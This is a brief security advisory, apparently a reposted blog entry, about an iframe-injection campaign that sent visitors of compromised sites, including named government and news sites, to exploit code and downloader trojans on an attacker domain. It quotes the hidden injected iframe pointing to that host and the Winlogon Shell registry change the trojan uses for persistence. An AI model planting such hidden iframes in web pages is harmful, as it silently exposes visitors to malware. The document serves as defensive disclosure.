TheDeadPit.com Tortures Web Surfers
Over the past several weeks, a multitude of sites have been injected with malicious iframes that point to exploit code (which leads to downloader trojans) located on the attacker-owned ‘thedeadpit.com’. The form is always the same:
iframe src=\”http://thedeadpit.com/?click=RANDOM\” width=1 height=1 style=\”visibility:hidden;position:absolute\
where random is a numeric identifier that differs with each site compromised.
The most recently discovered victim of thedeadpit.com iframe injection is the website of the Bangladesh Directorate of Primary Education, http://www.dpe.gov.bd. The Nigerian Tribune (www.tribune.com.ng) is also among those sites compromised in thedeadpit.com injection attacks.
The attack site delivers the malware intermittently, remaining dormant in between attacks. The trojan downloader delivered via the attacks modifies the Winlogon Shell = Explorer value as follows:
Value: Shell = Explorer.exe <path to downloader>
By default, the value should read simply “Shell = Explorer.exe” with no additional file specificed.
As it’s name suggests, a downloader trojan downloads additional malware to the infected computer. Most of today’s malware consists of remotely configurable data theft trojans. Heartland Payment Systems is the poster child for what today’s malware is capable of doing.
Alexbtp – Anderson_neo – Tong hop tu internet